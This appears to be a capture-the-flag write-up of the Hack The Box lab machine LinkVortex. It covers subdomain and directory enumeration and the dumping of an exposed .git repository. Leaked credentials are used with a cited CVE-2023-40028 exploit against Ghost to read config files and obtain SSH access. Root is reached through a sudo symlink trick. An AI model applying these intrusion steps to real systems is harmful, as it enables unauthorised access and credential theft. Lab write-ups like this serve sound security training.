HTB Writeup LinkVortex
Hacking 101 : Hack The Box Writeup 01
LinkVortex is a Linux machine on HTB, and this is the write-up on how I hacked it. I encourage you to find the loopholes on your own first :)
I try writing one (maybe 2 if i get time) write ups every week here on medium and also they get pushed to my Github.
First things first, we will start with an Nmap scan to check for open ports.
nmap -sC -sV 10.129.194.62
From the result, we find 2 open ports.
To continue enumeration, we will first add the IP address and domain to our /etc/hosts file.
Check the technologies used to build this webpage by using the Wappalyzer extension.
Now, let’s perform a directory search to expand our attack surface.
We will use Dirsearch; however, one can also use Dirb or ffuf:
dirsearch -u linkvortex.htb -t 50 -i 200
Going through our findings, we found something useful in /robots.txt this time.
Upon visiting, we found a few endpoints marked as disallowed, which prevents search engines from crawling them.
While other endpoints return a 404, we found a login page at /ghosts.
But we don’t know any credentials to use here, so for now, let’s search for subdomains if we find any.
We will use ffuf for this.
ffuf -u http://linkvortex.htb/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -H "Host:FUZZ.linkvortex.htb" -mc 200 we found a domain dev.linkvortex.htb .
Now to visit this lets add this too to our /etc/hosts.
Upon visiting — Not much lets search up its directory
dirsearch -u dev.linkvortex.htb -t 50 -i 200The results shows that there is a git leak .
If the
.git/directory is publicly accessible, it's a sign of a potential Git leak.
To check and obtain whole leak we will use GitHack .
Clone GitHack to your distro from here .
python GitHack.py -u "http://dev.linkvortex.htb/.git/"
After successfull completion of scan a new folder named “dev.linkvortex” will be creted with a javascript file “authentication.test.js” at this location:
/GitHack/dev.linkvortex.htb/ghost/core/test/regression/api/admin
Upon reviewing the js file , you will find a hard coded password in it
const password = 'OctopiFociPilfer45'; // on line 55Note: Also, line 4 in Dockerfile.ghost, which is ‘COPY config.production.json /var/lib/ghost/config.production.json,’ will be of special interest to us later on.
We can try logging in to http://linkvortex.htb/ghost/ portal we found earlier with these credentials:
//admin@linkvortex.htb as the username is a wild guess because the post done on the blog page was made by the user: admin.
username : admin@linkvortex.htb
password: OctopiFociPilfer45
We are logged in successfully.
Now, if you remember from the Wappalyzer extension, we learned that the site is using Ghost v5.58.
After some Googling we found v5.58 of Ghost has many vulnerabilities , one of them being CVE-2023–40028.
We can clone a exploit for the same from here .
After cloning , make sure to change the URL to “http://linkvortex.htb/” on line 14 in CVE-2023–40028.sh .
Now we will run the exploit using the username and password we got earlier:
./CVE-2023-40028.sh -u admin@linkvortex.htb -p OctopiFociPilfer45
Now if you remember the interesting findings from Dockerfile.ghost
/var/lib/ghost/config.production.jsonThis is nothing but the file path where we will find ssh username and pass , go to this path in your shell.
We got username and password :
username:bob@linkvortex.htb
password:fibber-talented-worthNow lets ssh into the machine:
We are in , now just cat user.txt to get user flag 🥰.
Now to get root flag we have to escalate our privileges.
first lets check Bob’s permission by sudo -l
Bob may not be the high-privileged user, but he can still execute these commands. So, let’s first see what is actually inside that file:
Open it by:
cat /opt/ghost/clean_symlink.sh
So , now lets understand how we can exploit this :
First we will make a xyz.txt file while will have text that will point to out root flag that is root.txt .
ln -s /root/root.txt xyz.txt
Now we will make a shortcut xyz.png which will point to xyz.txt . So when you open xyz.png, it secretly leads to /root/root.txt.
ln -s /home/bob/xyz.txt xyz.png
Now in the end we will run this command as root .
sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh /home/bob/xyz.pngThe script thinksxyz.png is a normal image file and moves it to a special folder. Since CHECK_CONTENT=true, the script prints the contents of xyz.png – which is actually root.txt! 😉
Congrats , have a good day ahead hacker.
